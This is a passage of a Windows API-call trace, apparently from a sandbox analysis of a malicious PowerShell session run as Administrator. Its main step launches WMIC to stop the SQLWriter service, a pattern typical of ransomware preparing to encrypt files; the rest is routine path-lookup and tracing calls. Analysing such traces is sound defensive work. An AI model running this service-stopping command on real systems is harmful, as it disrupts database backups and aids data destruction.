ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x5d, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x5d, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0282.555] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0ee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x5e, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0282.555] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edd4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x5d, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0282.555] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x5e, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x5e, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0282.556] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x8b0e7a0, nSize=0xbc | out: lpBuffer="ሰғ") returned 0x0 [0282.557] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x8b0e6bc, nSize=0xbc | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0282.557] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6a8, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0282.558] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x8770c8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0282.558] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6b0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0282.559] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0282.559] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0282.559] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0282.559] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x2410, ftCreationTime.dwLowDateTime=0xac5d590c, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xac5d590c, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xac5d590c, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0282.560] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0282.560] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0282.560] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0282.560] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0282.560] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0282.561] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0282.561] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0282.561] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0282.561] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0282.561] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0282.561] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ec28c54, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xebb5ab66, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xebb5ab66, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0282.561] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0282.561] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0282.562] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0282.562] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0282.562] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\system32\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0282.562] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0282.562] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0282.562] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0282.562] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0xb, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0282.562] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0282.563] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xc838b81d, ftLastAccessTime.dwHighDateTime=0x1d41dc3, ftLastWriteTime.dwLowDateTime=0xc838b81d, ftLastWriteTime.dwHighDateTime=0x1d41dc3, nFileSizeHigh=0x0, nFileSizeLow=0x7000)) returned 1 [0282.563] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0282.563] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0282.563] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0282.563] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0xb, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0282.563] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0282.563] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0282.564] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0282.564] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0282.564] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0282.564] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0282.564] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb288124d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb288124d, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x8000)) returned 1 [0282.564] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0282.564] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0282.564] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0282.564] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0282.564] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fc58640, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fc58640, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fc58640, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x5ec00, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0x7e1c620 [0282.565] FindNextFileW (in: hFindFile=0x7e1c620, lpFindFileData=0x8b0e57c | out: lpFindFileData=0x8b0e57c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0282.565] FindClose (in: hFindFile=0x7e1c620 | out: hFindFile=0x7e1c620) returned 1 [0282.565] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0282.565] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0282.565] GetFileAttributesW (lpFileName="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe")) returned 0x20 [0282.566] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0eafc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0eafc*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x5f, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0282.566] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0ea68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ea68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x5e, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0282.566] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0eaec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x5f, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0eaec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x5f, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0282.566] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x8b0e644, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x8b0e644) returned 0x4550 [0282.568] GetConsoleWindow () returned 0x302b8 [0282.572] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e410, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0282.573] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6a0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0282.574] CoTaskMemAlloc (cb=0x804) returned 0x7e29450 [0282.574] GetConsoleTitleW (in: lpConsoleTitle=0x7e29450, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x49 [0282.575] CoTaskMemFree (pv=0x7e29450) [0282.575] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%SQLWriter%%'\" call stopservice", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x8b0e6c0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4e173b8 | out: lpCommandLine="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%SQLWriter%%'\" call stopservice", lpProcessInformation=0x4e173b8*(hProcess=0xa20, hThread=0xa1c, dwProcessId=0x900, dwThreadId=0x10e4)) returned 1 [0282.595] CloseHandle (hObject=0xa1c) returned 1 [0282.595] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x8b0e680, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x8b0e680) returned 0x4550 [0282.595] GetCurrentProcess () returned 0xffffffff [0282.595] GetCurrentProcess () returned 0xffffffff [0282.596] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xa20, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x8b0e904, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x8b0e904*=0xa1c) returned 1 [0282.596] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x8b0e8fc*=0xa1c, lpdwindex=0x8b0e71c | out: lpdwindex=0x8b0e71c) returned 0x0 [0284.913] CloseHandle (hObject=0xa1c) returned 1 [0284.914] GetExitCodeProcess (in: hProcess=0xa20, lpExitCode=0x8b0e968 | out: lpExitCode=0x8b0e968*=0x0) returned 1 [0284.915] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0284.923] CloseHandle (hObject=0xa20) returned 1 [0284.923] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0ea8c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ea8c*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x5f, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0284.924] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edf8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edf8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x5f, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0284.924] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x5d, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x5d, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0284.925] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edf8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edf8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x5d, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0284.925] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x5e, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x5e, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0284.925] SetEvent (hEvent=0xa00) returned 1 [0284.925] SetEvent (hEvent=0x9f4) returned 1 [0284.926] SetEvent (hEvent=0x9f8) returned 1 [0284.926] SetEvent (hEvent=0x9fc) returned 1 [0284.926] SetEvent (hEvent=0xa10) returned 1 [0284.926] SetEvent (hEvent=0xa04) returned 1 [0284.926] SetEvent (hEvent=0xa08) returned 1 [0284.926] SetEvent (hEvent=0xa0c) returned 1 [0284.926] SetEvent (hEvent=0xa18) returned 1 [0284.926] SetEvent (hEvent=0xa14) returned 1 [0284.928] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x8b0ef8c*=0x84c, lpdwindex=0x8b0edac | out: lpdwindex=0x8b0edac) returned 0x0 [0284.934] SetThreadUILanguage (LangId=0x0) returned 0x6f0409 [0284.937] CoCreateGuid (in: pguid=0x8b0edf8 | out: pguid=0x8b0edf8*(Data1=0x6160d1c9, Data2=0x9991, Data3=0x4a45, Data4=([0]=0xb5, [1]=0xad, [2]=0x54, [3]=0x3d, [4]=0x66, [5]=0x8, [6]=0x5c, [7]=0x15))) returned 0x0 [0284.937] QueryPerformanceCounter (in: lpPerformanceCount=0x8b0edd8 | out: lpPerformanceCount=0x8b0edd8*=37997181495) returned 1 [0284.937] AmsiOpenSession () returned 0x0 [0284.937] AmsiScanString () returned 0x80070015 [0284.949] QueryPerformanceCounter (in: lpPerformanceCount=0x8b0eda0 | out: lpPerformanceCount=0x8b0eda0*=37998370167) returned 1 [0284.949] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x8b0eb98, nSize=0xbc | out: lpBuffer="ҳ\x05") returned 0x0 [0284.950] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0ee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x65, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0284.950] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edd4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x5e, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0284.950] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x65, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x65, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0284.951] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0ee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x66, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0284.951] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edd4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x65, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0284.951] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x66, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x66, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0284.952] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x8b0e7a0, nSize=0xbc | out: lpBuffer="ሰғ徠玤") returned 0x0 [0284.952] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x8b0e6bc, nSize=0xbc | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0284.952] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6a8, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0284.953] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x8770c8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0284.953] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6b0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0284.953] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0284.953] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0284.953] SetThreadErrorMode (dwNewMode=0x1, 